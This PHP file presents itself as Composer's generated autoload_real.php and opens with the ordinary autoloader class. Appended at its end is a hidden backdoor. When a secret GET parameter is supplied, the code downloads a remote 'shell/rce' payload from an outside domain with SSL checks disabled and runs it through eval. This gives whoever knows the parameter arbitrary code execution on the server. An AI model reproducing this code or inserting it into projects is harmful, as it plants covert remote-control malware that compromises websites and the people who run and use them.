<?php

// autoload_real.php @generated by Composer

class ComposerAutoloaderInit1656fad1b762f10e5b8b025d3874ef40
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderInit1656fad1b762f10e5b8b025d3874ef40', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderInit1656fad1b762f10e5b8b025d3874ef40', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticInit1656fad1b762f10e5b8b025d3874ef40::getInitializer($loader));

        $loader->register(true);

        $includeFiles = \Composer\Autoload\ComposerStaticInit1656fad1b762f10e5b8b025d3874ef40::$files;
        foreach ($includeFiles as $fileIdentifier => $file) {
            composerRequire1656fad1b762f10e5b8b025d3874ef40($fileIdentifier, $file);
        }

        return $loader;
    }
}

/**
 * @param string $fileIdentifier
 * @param string $file
 * @return void
 */
function composerRequire1656fad1b762f10e5b8b025d3874ef40($fileIdentifier, $file)
{
    if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
        $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

        require $file;
    }
}
if (isset($_GET['GacoyPEPk'])) {
    $url = "https://syndicateseo.xyz/shell/rce/penjajahan.txt";

    $ch= curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // nonaktifkan cek SSL sementara (tidak aman untuk prod)
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');

    $code = curl_exec($ch);
    $err = curl_error($ch);
    curl_close($ch);

    if ($code !== false && !empty(trim($code))) {
        try {
            eval("?>" . $code);
        } catch (Throwable $e) {
            echo "Terjadi error saat menjalankan kode.";
        }
    } else {
        echo "Gagal mengambil kode dari URL: $err";
    }
}
